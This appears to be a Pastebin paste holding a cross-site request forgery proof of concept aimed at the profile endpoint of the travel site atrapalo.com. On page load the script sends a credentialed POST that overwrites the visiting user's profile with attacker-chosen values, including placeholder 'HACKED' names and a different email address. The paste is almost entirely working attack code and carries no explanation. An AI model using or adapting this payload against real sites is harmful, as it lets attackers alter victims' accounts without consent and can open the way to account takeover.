Advertisement
Guest User

Untitled

a guest
Oct 25th, 2014
10,095
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <script language="javascript" type="text/javascript">
  2. function run(){
  3.     var http;
  4.     http = new XMLHttpRequest();
  5.     http.open("POST", "https://www.atrapalo.com/miatrapalo/perfil", true);
  6.     http.setRequestHeader('Content-Type', 'text/plain');
  7.     http.setRequestHeader('Accept', 'application/json, text/javascript, */*; q=0.01');
  8.     http.withCredentials = "true";
  9.     http.onreadystatechange = function()
  10.     {
  11.         if (http.readyState == 4) {
  12.             var response = http.responseText;
  13.         }
  14.     }
  15.     http.send('{"id":"11111111","nombre":"HACKEDNAME","apellido":"HACKEDAPEL","telefono":"","fecha_nacimiento":"10/10/1985","hijos":"","sexo":"H","avatar":"","email":"mail@gmail.com","suscrito":"","idRegion":"36","nacionalidad":"España","cod_nacionalidad":"ES","provincia":"","id_provincia":"","poblacion":"","codigo_postal":"","nif":"","pasaporte":"","fecha_pasaporte":"","familia_numerosa":"0","residente_islas":"0","avatarSrc":"/images_new/A/miatrapalo/profile-default-hombre.jpg","dia_nacimiento":"10","mes_nacimiento":"10","anyo_nacimiento":"1985","porcentaje":63,"edit":true,"form_datos":1,"generoTexto":"Hombre"}');
  16. }
  17. run();
  18. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement